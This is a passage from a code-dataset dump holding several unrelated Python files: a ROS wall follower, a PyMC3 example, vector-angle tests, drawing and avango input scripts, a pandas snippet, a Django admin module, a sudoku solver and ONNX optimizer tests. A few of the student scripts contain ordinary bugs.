quat.w\n sinr_cosp = 2 * (w * x + y * z)\n cosr_cosp = 1 - 2 * (x * x + y * y)\n roll = np.arctan2(sinr_cosp, cosr_cosp)\n sinp = 2 * (w * y - z * x)\n pitch = np.arcsin(sinp)\n siny_cosp = 2 * (w * z + x * y)\n cosy_cosp = 1 - 2 * (y * y + z * z)\n yaw = np.arctan2(siny_cosp, cosy_cosp)\n return roll, pitch, yaw\n\n\n def control_timer_callback(self,):\n \"\"\"logic\"\"\"\n print(self.current_state,\"1\")\n\n # 1. start forward, init\n if self.current_state == 'start':\n print(self.current_state)\n self.current_yaw = 0.\n\n self.current_state = 'forward'\n print(self.current_state, \"1\")\n\n # 2. 
Conditions for driving forward \n        elif self.current_state == 'forward':\n            if self.distance_array[0] > 0.5:\n                self.target_yaw = self.current_yaw + np.deg2rad(self.turn_deg)\n                self.control_publisher.publish(self.create_forward_msg())\n                print( self.current_state,\"2\",\"\\nFront sensor: \", self.distance_array[0],\"[m], \\n\\nCurrent_yaw: \", np.rad2deg(self.current_yaw), \"\\n\", \"Target yaw: \", np.rad2deg(self.target_yaw), \"\\n\\n\")\n            else:\n                self.current_state = 'turn_right'\n\n        # 3. condition for turning right\n        elif self.current_state == 'turn_right':\n            if self.target_yaw > np.deg2rad(180):\n                self.target_yaw = self.target_yaw - np.deg2rad(360)\n            self.control_publisher.publish(self.create_turnright_msg())\n            print( self.current_state,\"3\",\"\\nFront sensor: \", self.distance_array[0],\"[m], \\n\\nCurrent_yaw: \", np.rad2deg(self.current_yaw), \"\\n\", \"Target yaw: \", np.rad2deg(self.target_yaw), \"\\n\\n\")\n            if self.current_yaw >= self.target_yaw:\n                self.current_state = 'forward'\n\n\ndef main():\n    rclpy.init()\n    node = WallFollower()\n    rclpy.spin(node)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"src/automate_turtlebot3_pkg/automate_turtlebot3_pkg/Wall_Follower_v2.py","file_name":"Wall_Follower_v2.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"50434442","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 19:58:01 2020\n\n@author: davideferri\n\"\"\"\n\nimport pandas as pd \nimport numpy as np \nimport scipy.stats as ss\nimport pymc3 as pm \nimport arviz as az\nimport logging\n\n# configure a module-level logger; log.info is used throughout this script\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__name__)\n\n# ---------------------- generate draws from the population ---------------------------- #\n\n# set the random seed \nnp.random.seed(123)\n# set the true value of the parameters\nmue_true = 1 ; sigma_true = 50\n# set the number of draws \ndraws = 1000\n# get the draws from the population \ndata = ss.norm.rvs(loc= mue_true, scale= sigma_true, size = draws)\nlog.info(\"the data drawn is as follows: %s\", data)\n# plot the Kernel 
density estimation of the data\naz.plot_kde(data)\n\n# ------------------------ specify the probabilistic model --------------------------- # \n\nwith pm.Model() as gaussian_model:\n    # set the priors for the parameters\n    mu = pm.Uniform(\"mu\",-10,10)\n    sigma = pm.HalfNormal(\"sigma\",10)\n    # get the likelihood\n    y = pm.Normal(\"obs\", mu = mu, sigma = sigma, observed = data)\n    # inference step \n    trace = pm.sample(1000)\n    \n# ----------------------- analyse the posterior --------------------------------------- #\n    \nwith gaussian_model:\n    # show the trace\n    log.info(\"The trace of mu is: %s\", trace[\"mu\"])\n    log.info(\"the shape is %s\", trace[\"mu\"].shape)\n    log.info(\"The trace of sigma is: %s\", trace[\"sigma\"])\n    log.info(\"the shape is %s\", trace[\"sigma\"].shape)\n    # show the trace summary\n    az.summary(trace)\n    # plot the trace KDE and MCMC draws\n    az.plot_trace(trace)\n    # plot the trace joint KDE \n    az.plot_joint(trace, kind=\"kde\", fill_last = False)\n    \n# ------------------------ get samples of the data from the posterior ----------------- # \n    \nwith gaussian_model:\n    # get the samples of the data\n    y_new = pm.sample_posterior_predictive(trace)\n    log.info(\"The samples from the data are: %s\", y_new[\"obs\"])\n    log.info(\"The shape of the samples is: %s\", y_new[\"obs\"].shape)\n    # visual check for whether the original sample makes sense given the posterior\n    data_ppc = az.from_pymc3(trace=trace,posterior_predictive=y_new)\n    ax = az.plot_ppc(data_ppc,figsize=(12,6),mean=False)\n    ax[0].legend(fontsize=15)\n    ","sub_path":"Gaussian_example.py","file_name":"Gaussian_example.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120110247","text":"#!/usr/bin/env python3\n\nimport pytest\nimport math\nimport numpy as np\nimport _vector\n\ndef angle(vec1, vec2):\n    dot_product = np.dot(vec1, vec2)\n    len1 = np.dot(vec1, vec1)\n    len2 = np.dot(vec2, vec2)\n    return np.arccos(dot_product / (np.sqrt(len1 * len2)))\n\ndef testInvalidVector():\n    with pytest.raises(TypeError):\n        _vector.angle([0, 0], [])\n    with pytest.raises(TypeError):\n        _vector.angle([], [0, 0])\n    with pytest.raises(TypeError):\n        _vector.angle([], [])\n    with pytest.raises(TypeError):\n        _vector.angle([\"1\", 2], [1, 1])\n\n# Test for zero-length 2-vector (invalid input).\ndef testZeroLengthVector():\n    with pytest.raises(ValueError):\n        _vector.angle([1, 1], [0, 0])\n    with pytest.raises(ValueError):\n        _vector.angle([0, 0], [1, 1])\n    with pytest.raises(ValueError):\n        _vector.angle([0, 0], [0, 0])\n\n# Test for zero angle.\ndef testZeroAngle():\n    for i in range(10):\n        mult = np.random.randint(1, 10)\n        vec1 = np.random.randint(1, 10, 2)\n        vec2 = vec1 * mult\n        assert (_vector.angle(vec1, vec2)) == 0\n\n# Test for right angle (90-deg) and straight angle (180-degree).\ndef testRightAndStraightAngle():\n    for i in range(10):\n        vec1 = np.random.randint(1, 10, 2)\n        vec2 = np.array([-vec1[1], vec1[0]])\n        vec3 = np.array([vec1[1], -vec1[0]])\n        # Test for 90-degree (a bare pytest.approx call checks nothing, so assert the comparison).\n        assert _vector.angle(vec1, vec2) == pytest.approx(math.pi / 2)\n        assert _vector.angle(vec1, vec3) == pytest.approx(math.pi / 2)\n        # Test for 180-degree.\n        assert _vector.angle(vec2, vec3) == pytest.approx(math.pi)\n\n# Test for one other angle.\ndef testArbitraryVector():\n    for i in range(10):\n        vec1 = np.random.randint(1, 10, 2)\n        vec2 = np.random.randint(1, 10, 2)\n        assert _vector.angle(vec1, vec2) == pytest.approx(angle(vec1, vec2))\n\ndef testAngle():\n    for i in range(10):\n        theta = 1 / np.random.randint(1, 10)\n        
assert _vector.angle([np.cos(theta), np.sin(theta)], [1, 0]) == pytest.approx(theta)\n        assert _vector.angle([np.cos(theta), np.sin(-theta)], [1, 0]) == pytest.approx(theta)\n","sub_path":"hw2/TommyLin/q2/test_vector.py","file_name":"test_vector.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"205393792","text":"# pyramid.py\n# Prints a pyramid made of n square bricks, n given by user.\n#\n# Hannah Lily Postman\n# 18 February 2016\n\nimport picture # Module to help us render visual\n\nwidth = int(input(\"How wide is the canvas? \"))\nn = int(input(\"How tall shall we make the pyramid (we also use this number for how many bricks to put in the base)? \"))\n\n#def DrawBrick(s):\n    # Draws a square 'brick' with side length s\n    #sideLength = n/width\n   # canvas.drawRect(i*(s/2), y-s*i, s, y/n)\n\n    \n\ndef Pyramid(width, n):\n    canvas = picture.Picture(width, width)\n    canvas.setOutlineColor(0,0,0)\n    canvas.setFillColor(0, 255, 255)\n    s = width/n # length for any side s of the square brick\n    for i in range(0, n):\n        xStart = i*(s/2) # Each row, move in half a brick's length\n        yStart = width-s*i\n        for j in range(0, n-i): # use j here so the row counter i is not shadowed\n            canvas.drawRect(xStart, yStart, s, s) # Draw the block\n            xStart = xStart + s # Start adjacent square to the right of the previous one\n\n\nPyramid(width, n)\n\n    \n","sub_path":"Lab/lab3/Ignore/testPyramid2.py","file_name":"testPyramid2.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"104166417","text":"#!/usr/bin/python\n\n## @file\n# Contains classes MouseRayInput and 3DRayInput\n\n# import guacamole libraries\nimport avango\nimport avango.gua\nimport avango.script\nfrom avango.script import field_has_changed\nimport avango.daemon\n\nimport math\nimport EdgeContainer\n\n# Class for getting the mouse input\nclass MouseRayInput(avango.script.Script):\n\n    sf_mouse_x = avango.SFFloat()\n    sf_mouse_y = avango.SFFloat()\n    sf_output_mat = avango.gua.SFMatrix4()\n    \n    ## Custom constructor.\n    # @param PARENT_NODE Reference to \n    # @param TRACKING_STATION \n    def __init__(self, PARENT_NODE, TRACKING_STATION):\n        self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n        self.tracking_sensor.Station.value = TRACKING_STATION\n        #self.tracking_sensor.ReceiverOffset.value = avango.gua.make_identity_mat()\n        #self.tracking_sensor.TransmitterOffset.value = avango.gua.make_identity_mat()\n        \n        self.mouse_sensor = MouseSensor()\n        self.mouse_mover.my_constructor(self.tracking_sensor, PARENT_NODE.WorldTransform.value)\n        self.pickray_matrix = self.mouse_mover.sf_output_mat\n\n        self.sf_mouse_x.connect_from(self.tracking_sensor.Value0)\n        self.sf_mouse_y.connect_from(self.tracking_sensor.Value1)\n        \n        self.plane_mat = avango.gua.make_trans_mat(0,1.18,3)\n        self.mouse_mat = avango.gua.make_trans_mat(0,1.18,0.5)\n        \n        self.sf_output_mat.value = avango.gua.make_trans_mat(0,1.18,1)\n\n        self._point2_old = avango.gua.Vec3(0,1,0)\n\n        self.old_axis = avango.gua.Vec3(0,0,0)\n        self.old_vec3 = avango.gua.Vec3(0,0,0)\n\n    #callbacks:\n    @field_has_changed(sf_mouse_x)\n    def sf_mouse_x_changed(self):\n        \n        if self.plane_mat != None and self.mouse_mat != None: \n        \n            _mat = self.mouse_mat * avango.gua.make_trans_mat((0.01)*self.sf_mouse_x.value, \n                                                              (-0.02)*self.sf_mouse_y.value, \n                                                              0)\n            self.mouse_mat = _mat\n            \n            _point1 = self.plane_mat.get_translate()\n            _point2 = self.mouse_mat.get_translate()\n            \n            _vec1 = _point1 - 
self._point2_old\n _vec2 = _point1 - _point2\n _vec3 = _vec1.cross(_vec2)\n \n _axis = _vec3\n if _vec1.x == _vec2.x and _vec1.y == _vec2.y and _vec1.z == _vec2.z :\n _axis = self.old_axis\n\n self.old_axis = _axis\n _axis.normalize()\n _angle = math.degrees(math.acos( round(_vec1.dot( _vec2) / (_vec1.length() * _vec2.length()),6)))\n _rotation_mat = avango.gua.make_rot_mat(_angle, _axis)\n\n self.sf_output_mat.value = self.sf_output_mat.value * _rotation_mat\n self._point2_old = _point2\n\n# Class to get the 3D input\nclass RayInput :\n\n ## Custom constructor.\n # @param TRACKING_TRANSMITTER_OFFSET \n # @param POINTER_TRACKING_STATION Is talking with the tracking station. \n def __init__(self, TRACKING_TRANSMITTER_OFFSET, POINTER_TRACKING_STATION):\n\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n self.tracking_sensor.Station.value = POINTER_TRACKING_STATION\n self.tracking_sensor.ReceiverOffset.value = avango.gua.make_identity_mat()\n self.tracking_sensor.TransmitterOffset.value = TRACKING_TRANSMITTER_OFFSET\n\n self.pickray_matrix = self.tracking_sensor.Matrix\n\n# Class to get the Key input\nclass KeyboardInput(avango.script.Script):\n\n sf_key_r = avango.SFBool()\n sf_key_c = avango.SFBool()\n\n ## Custom constructor.\n # @param TRACKING_TRANSMITTER_OFFSET \n # @param POINTER_TRACKING_STATION Is talking with the tracking station. \n def __init__(self):\n self.super(KeyboardInput).__init__()\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n\n def my_constructor(self, TRACKING_STATION):\n self.tracking_sensor.Station.value = TRACKING_STATION\n self.sf_key_c.connect_from(self.tracking_sensor.Button21)\n self.sf_key_r.connect_from(self.tracking_sensor.Button3)\n\n\n# Class for getting the mouse input and \n# A ray will be calculated from screen through your mouse cursor\nclass MouseInput(avango.script.Script):\n\n sf_button_left = avango.SFBool()\n sf_mouse_x = avango.SFFloat()\n sf_mouse_y = avango.SFFloat()\n\n sf_cursor_pos_mat = avango.gua.SFMatrix4()\n sf_ray_mat = avango.gua.SFMatrix4()\n\n \n ## Custom constructor.\n # @param PARENT_NODE Reference to \n # @param TRACKING_STATION \n def __init__(self):\n self.super(MouseInput).__init__()\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n #self.sf_cursor_pos_mat.value = avango.gua.make_identity_mat()\n self.mouse_pos_x = 0.0 \n self.mouse_pos_y = 0.0\n self.always_evaluate(True)\n\n def my_constructor(self, EYE_NODE, SCREEN_NODE ,TRACKING_STATION):\n self.tracking_sensor.Station.value = TRACKING_STATION\n #self.tracking_sensor.ReceiverOffset.value = avango.gua.make_identity_mat()\n #self.tracking_sensor.TransmitterOffset.value = avango.gua.make_identity_mat()\n self.EYE_NODE = EYE_NODE\n self.SCREEN_NODE = SCREEN_NODE\n\n # connections to the sensor (click, move mouse)\n self.sf_button_left.connect_from(self.tracking_sensor.Button0)\n self.sf_mouse_x.connect_from(self.tracking_sensor.Value0)\n self.sf_mouse_y.connect_from(self.tracking_sensor.Value1)\n \n \"\"\"def evaluate(self):\n self.mouse_pos_x += self.sf_mouse_x.value* 0.001\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.mouse_pos_y -= self.sf_mouse_y.value* 0.001\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.5), 0.3 * 0.5)\n self.sf_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\"\"\"\n\n @field_has_changed(sf_mouse_x)\n def 
moved_mouse_x(self):\n self.mouse_pos_x += self.sf_mouse_x.value* 0.001\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.sf_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n @field_has_changed(sf_mouse_y)\n def moved_mouse_y(self):\n self.mouse_pos_y -= self.sf_mouse_y.value* 0.001\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.4), 0.3 * 0.4)\n self.sf_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n \n\n @field_has_changed(sf_button_left)\n def clicked_left_button(self):\n if(self.sf_button_left.value):\n pass\n elif(self.sf_button_left.value == False):\n pass\n \n @field_has_changed(sf_cursor_pos_mat)\n def moved_cursor(self):\n _cursor_pos = self.sf_cursor_pos_mat.value.get_translate()\n _eye_pos = self.EYE_NODE.Transform.value.get_translate()\n #_eye_pos = self.proxy.Transform.value.get_translate()\n\n _dir = _cursor_pos - _eye_pos\n _dir.normalize()\n _ref = avango.gua.Vec3(0.0,0.0,-1.0)\n\n _axis = _ref.cross(_dir)\n _angle = math.acos(_ref.dot(_dir))\n _angle = math.degrees(_angle)\n _rot_mat = avango.gua.make_rot_mat(_angle, _axis)\n\n self.sf_ray_mat.value = avango.gua.make_trans_mat(_cursor_pos) * _rot_mat\n\n\n# Class for moving a cursor with the wasd key of a keyboard\nclass WASDMouseInput(avango.script.Script):\n\n sf_click_left = avango.SFBool()\n sf_mouse_x = avango.SFFloat()\n sf_mouse_y = avango.SFFloat()\n\n sf_in_cursor_worldpos_mat = avango.gua.SFMatrix4()\n sf_out_cursor_pos_mat = avango.gua.SFMatrix4()\n sf_ray_mat = avango.gua.SFMatrix4()\n\n sf_key_w = avango.SFBool()\n sf_key_a = avango.SFBool()\n sf_key_s = avango.SFBool()\n sf_key_d = avango.SFBool()\n ## Custom constructor.\n # @param TRACKING_TRANSMITTER_OFFSET \n # @param POINTER_TRACKING_STATION Is talking with the tracking station. 
\n def __init__(self):\n self.super(WASDMouseInput).__init__()\n self.tracking_sensor = avango.daemon.nodes.DeviceSensor(DeviceService = avango.daemon.DeviceService())\n self.proxy_eye_node = avango.gua.nodes.TransformNode(Name = \"proxy_eye\")\n\n self.mouse_pos_x = 0.0 \n self.mouse_pos_y = 0.0\n self.always_evaluate(True)\n\n def my_constructor(self, TRACKING_STATION, SCREEN_NODE, MOUSE_TRANSFORM_NODE ):\n self.tracking_sensor.Station.value = TRACKING_STATION\n self.sf_click_left.connect_from(self.tracking_sensor.Button31)\n self.sf_key_w.connect_from(self.tracking_sensor.Button0)\n self.sf_key_a.connect_from(self.tracking_sensor.Button1)\n self.sf_key_s.connect_from(self.tracking_sensor.Button2)\n self.sf_key_d.connect_from(self.tracking_sensor.Button3)\n\n self.proxy_eye_node.Transform.value = avango.gua.make_trans_mat(0.0, 0.0, 0.6)\n SCREEN_NODE.Children.value.append(self.proxy_eye_node)\n # conntection to calc ray from eye through cursor position\n self.sf_in_cursor_worldpos_mat.connect_from(MOUSE_TRANSFORM_NODE.WorldTransform)\n\n @field_has_changed(sf_click_left)\n def clicked_left_btn(self):\n print(\"space pressed\")\n\n def evaluate(self):\n if (self.sf_key_d.value == True):\n self.mouse_pos_x += 0.002\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n if (self.sf_key_a.value == True):\n self.mouse_pos_x -= 0.002\n self.mouse_pos_x = min(max(self.mouse_pos_x,0.5 * -0.5), 0.5 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n if(self.sf_key_w.value):\n self.mouse_pos_y += 0.002\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.5), 0.3 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n if(self.sf_key_s.value):\n self.mouse_pos_y -= 0.002\n self.mouse_pos_y = min(max(self.mouse_pos_y,0.3 * -0.5), 0.3 * 0.5)\n self.sf_out_cursor_pos_mat.value = avango.gua.make_trans_mat(self.mouse_pos_x, self.mouse_pos_y, 0.01)\n\n @field_has_changed(sf_in_cursor_worldpos_mat)\n def moved_cursor(self):\n _cursor_pos = self.sf_in_cursor_worldpos_mat.value.get_translate()\n _eye_pos = self.proxy_eye_node.WorldTransform.value.get_translate()\n\n _dir = _cursor_pos - _eye_pos\n _dir.normalize()\n _ref = avango.gua.Vec3(0.0,0.0,-1.0)\n\n _axis = _ref.cross(_dir)\n _angle = math.acos(_ref.dot(_dir))\n _angle = math.degrees(_angle)\n _rot_mat = avango.gua.make_rot_mat(_angle, _axis)\n\n self.sf_ray_mat.value = avango.gua.make_trans_mat(_cursor_pos) * _rot_mat","sub_path":"Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":10381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426713841","text":"import pandas as pd\r\nimport numpy as np\r\n \r\ndata = {'name': ['xy', 'abc', 'vishal', 'cds', 'hello'],\r\n 'age': [15, 17, 20, 18, 16],\r\n 'branch': [cse, ece,eee,mech,it],'year-sem': [1-1, 2-2, 1-2, 3-1, 4-1],'score': [95, 67, 70, 68, 86],}\r\n \r\ndf = pd.DataFrame(data, index = ['Acme', 'Acme', 'Bilbao', 'Bilbao', 'Bilbao'])\r\n \r\ndf_filtered = df.query('score>70')\r\nprint(df_filtered)","sub_path":"userinfo.py","file_name":"userinfo.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"3237663","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.contrib import 
+{"seq_id":"3237663","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.admin import SimpleListFilter\n\n\nclass PublishableAdmin(admin.ModelAdmin):\n    \"\"\"\n    Overrides standard admin.ModelAdmin save_model method\n    It sets user (author) based on data from request.\n    \"\"\"\n    list_display = ['title', 'channel_name', 'date_available', 'published']\n    list_filter = ['date_available', 'published', 'channel_name',\n                   'child_class']\n    search_fields = ['title', 'slug', 'headline', 'channel_name']\n    exclude = ('user',)\n\n    actions = ['publish']\n\n    def publish(modeladmin, request, queryset):\n        for obj in queryset:\n            obj.published = not obj.published\n            obj.save()\n    publish.short_description = _(u'Publish/Unpublish')\n\n    def save_model(self, request, obj, form, change):\n        if getattr(obj, 'pk', None) is None:\n            obj.user = get_user_model().objects.get(pk=request.user.pk)\n            obj.date_insert = timezone.now()\n            obj.site = Site.objects.get(pk=settings.SITE_ID)\n        obj.date_update = timezone.now()\n        obj.save()\n\n\nclass ChannelListFilter(SimpleListFilter):\n    # Human-readable title which will be displayed in the\n    # right admin sidebar just above the filter options.\n    title = _(u'Channel')\n\n    # Parameter for the filter that will be used in the URL query.\n    parameter_name = 'channel'\n\n    def lookups(self, request, model_admin):\n        \"\"\"\n        Returns a list of tuples. The first element in each\n        tuple is the coded value for the option that will\n        appear in the URL query. The second element is the\n        human-readable name for the option that will appear\n        in the right sidebar.\n        \"\"\"\n        qs = model_admin.queryset(request)\n        qs = qs.distinct().values('channel_name', 'channel_long_slug')\n        if qs:\n            return set([(item['channel_long_slug'] or 'nochannel',\n                         item['channel_name'] or _(u'No channel'))\n                        for item in qs])\n\n    def queryset(self, request, queryset):\n        \"\"\"\n        Returns the filtered queryset based on the value\n        provided in the query string and retrievable via\n        `self.value()`.\n        \"\"\"\n        if self.value() == \"nochannel\":\n            queryset = queryset.filter(channel_long_slug__isnull=True)\n        elif self.value():\n            queryset = queryset.filter(channel_long_slug=self.value())\n\n        return queryset\n\n\nclass BaseBoxAdmin(PublishableAdmin):\n\n    prepopulated_fields = {\"slug\": [\"name\"]}\n    list_display = ['name', 'channel_name', 'date_available', 'published']\n    list_filter = [ChannelListFilter, 'date_available', 'published']\n    raw_id_fields = ['channel', 'article']\n    search_fields = ['name', 'slug', 'channel_name']\n\n    fieldsets = (\n        (_(u'Identification'), {\n            'fields': ('site', 'name', 'slug')}),\n        (_(u'Relationships'), {\n            'fields': (('channel', 'article'),)}),\n        (_(u'Publication'), {\n            'classes': ('extrapretty',),\n            'fields': ('published', 'date_available')}),\n    )\n\n    def queryset(self, request):\n        qs = super(BaseBoxAdmin, self).queryset(request)\n        try:\n            # only superusers can see queryset boxes\n            if not request.user.is_superuser:\n                qs = qs.filter(queryset__isnull=True)\n        except:\n            pass  # admin model does not have the queryset field\n        return qs\n\n\ndef apply_rules(admin_class, app):\n    \"\"\"\n    To allow overrides of admin rules for opps apps\n    it uses the settings.py to load the values\n\n    example of use:\n\n    your project's settings.py\n\n    OPPS_ADMIN_RULES = {\n        'appname.ModelNameAdmin': {\n            'fieldsets': (\n                (u'Identification', {\n                    'fields': ('site', 
'title', 'slug')}),\n ),\n 'list_display': (...),\n 'list_filter': (...),\n 'search_fields': (...),\n ...\n }\n }\n\n On appname/admin.py\n\n as a factory:\n\n from opps.core.admin import apply_rules\n ModelNameAdmin = apply_rules(ModelNameAdmin, 'appname')\n\n as a decorator:\n\n from opps.core.admin import apply_opps_rules\n\n @apply_opps_rules('appname')\n class ModelNameAdmin(admin.ModelAdmin):\n ...\n \"\"\"\n\n key = \"{0}.{1}\".format(app, admin_class.__name__)\n OPPS_ADMIN_RULES = getattr(settings, 'OPPS_ADMIN_RULES', {})\n rules = OPPS_ADMIN_RULES.get(key)\n\n if not rules:\n return admin_class\n\n fieldsets = rules.get('fieldsets')\n if fieldsets:\n new_items = [(_(item[0]), item[1]) for item in fieldsets]\n admin_class.fieldsets = new_items\n\n attrs = ('list_display', 'list_filter',\n 'search_fields', 'exclude', 'raw_id_fields',\n 'prepopulated_fields')\n\n for attr in attrs:\n to_apply = rules.get(attr)\n if to_apply:\n setattr(admin_class, attr, to_apply)\n\n field_overrides = rules.get('field_overrides')\n \"\"\"\n Allow field attr overrides before form is rendered\n 'images.ImagesAdmin': {\n 'field_overrides': {\n \"slug\": {\"help_text\": \"banana\"}\n }\n }\n \"\"\"\n if field_overrides:\n def get_form(self, request, obj=None, **kwargs):\n form = super(self.__class__, self)\\\n .get_form(request, obj, **kwargs)\n if hasattr(form, 'base_fields'):\n for field, attrs in field_overrides.iteritems():\n for attr, value in attrs.iteritems():\n if isinstance(value, (str, unicode)):\n value = _(value)\n try:\n setattr(form.base_fields[field], attr, value)\n except:\n pass # KeyError base_fields[field]\n return form\n admin_class.get_form = get_form\n\n # TODO:\n # form\n # inlines\n # actions\n # override methods\n\n return admin_class\n\n\ndef apply_opps_rules(app):\n\n def wrap(admin_class):\n admin_class = apply_rules(admin_class, app)\n return admin_class\n\n return wrap\n\napply_opps_rules.__doc__ = apply_rules.__doc__\n","sub_path":"opps/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85817500","text":"d = 9\nD = range(9)\ne = 3\ns = 0\n\nclass Board:\n def __init__(self, clues):\n self.squares = [[Square(r, c, self, clues[r][c]) for c in D] for r in D]\n\n self.B = [Section() for i in D]\n self.C = [Section() for i in D]\n self.R = [Section() for i in D]\n\n for r in D:\n for c in D:\n b = self.B[c // e + e * (r // 3)]\n s = self.squares[r][c]\n s.box = b\n b.squares.append(s)\n s.column = self.C[c]\n self.C[c].squares.append(s)\n s.row = self.R[r]\n self.R[r].squares.append(s)\n\n def __str__(self):\n s = \"\"\n\n for r in D:\n for c in D:\n s += \"%d \" % self.squares[r][c].value\n\n if not (c + 1) % 3:\n s += \" \"\n\n s += \"\\n\"\n\n if not (r + 1) % 3:\n s += \"\\n\"\n\n return s\n\nclass Section:\n def __init__(self):\n self.squares = []\n\n def __call__(self):\n values = [s.value for s in self.squares if s.value]\n return max(values.count(v) for v in values) <= 1\n\nclass Square:\n def __init__(self, r, c, board, value):\n self.r = r\n self.c = c\n self.board = board\n self.value = value\n\n def next_square(self):\n for r in D:\n for c in D:\n i = d * r + c\n\n if i <= d * self.r + self.c:\n continue\n\n s = self.board.squares[r][c]\n\n if not s.value:\n return s\n\n def solve(self):\n global s\n\n n = self.next_square()\n\n if self.value:\n return n.solve()\n\n for i in D:\n self.value = i + 1\n\n if not (self.box() and 
self.column() and self.row()):\n continue\n\n if not n:\n s += int(\"\".join(str(i.value) for i in self.board.squares[0][:3]))\n return\n\n n.solve()\n\n self.value = 0\n\ntext = open(\"sudoku.txt\").readlines()\n\nfor i in range(50):\n Board([[int(text[10 * i + 1 + r][c]) for c in D] for r in D]).squares[0][0].solve()\n\nprint(s)\n","sub_path":"096.py","file_name":"096.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"621648848","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT license.\n\n\"\"\"Unit Tests for optimizers such as TransposeOptimizer.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport numpy as np\nfrom onnx import helper, TensorProto\nfrom tf2onnx.graph import GraphUtil\nfrom backend_test_base import Tf2OnnxBackendTestBase\n\n\n# pylint: disable=missing-docstring,invalid-name,unused-argument,using-constant-test\n\n\nclass OptimizerTests(Tf2OnnxBackendTestBase):\n \"\"\"Run original model proto and modified model proto with onnxruntime, compare the results.\"\"\"\n\n def run_and_compare(self, output_names_with_port, onnx_feed_dict, origin_proto, debug=False, rtol=1e-07):\n origin_model_path = self.save_onnx_model(origin_proto, onnx_feed_dict, postfix=\"_origin\")\n\n new_proto = GraphUtil.opt_transposes_with_model_proto(origin_proto)\n\n self.assertTrue(new_proto, msg=\"model proto after optimizer should not be None\")\n\n new_model_path = self.save_onnx_model(new_proto, onnx_feed_dict, postfix=\"_opt\")\n\n previous = GraphUtil.get_node_count_from_onnx_graph(origin_proto.graph)\n current = GraphUtil.get_node_count_from_onnx_graph(new_proto.graph)\n\n self.assertTrue(current[\"Transpose\"] < previous[\"Transpose\"], msg=\"transpose ops count not changed\")\n\n if type(self).BACKEND == \"onnxruntime\":\n expected = self.run_onnxruntime(origin_model_path, onnx_feed_dict, output_names_with_port)\n actual = self.run_onnxruntime(new_model_path, onnx_feed_dict, output_names_with_port)\n else:\n raise ValueError(\"only onnxruntime is supported to test transpose optimizer\")\n\n for expected_val, actual_val in zip(expected, actual):\n self.assertAllClose(expected_val, actual_val, rtol=rtol, atol=0.)\n self.assertEqual(expected_val.dtype, actual_val.dtype)\n self.assertEqual(expected_val.shape, actual_val.shape)\n\n def test_relu(self):\n node1 = helper.make_node(\"Transpose\", [\"X\"], [\"Y\"], perm=[0, 2, 3, 1], name=\"trans_1\")\n node2 = helper.make_node(\"Relu\", [\"Y\"], [\"Z\"], name=\"relu\")\n node3 = helper.make_node(\"Transpose\", [\"Z\"], [\"Z1\"], perm=[0, 3, 1, 2], name=\"trans_2\")\n\n graph = helper.make_graph(\n [node1, node2, node3],\n \"relu-test\",\n [helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, (2, 3, 4, 5))],\n [helper.make_tensor_value_info(\"Z1\", TensorProto.FLOAT, 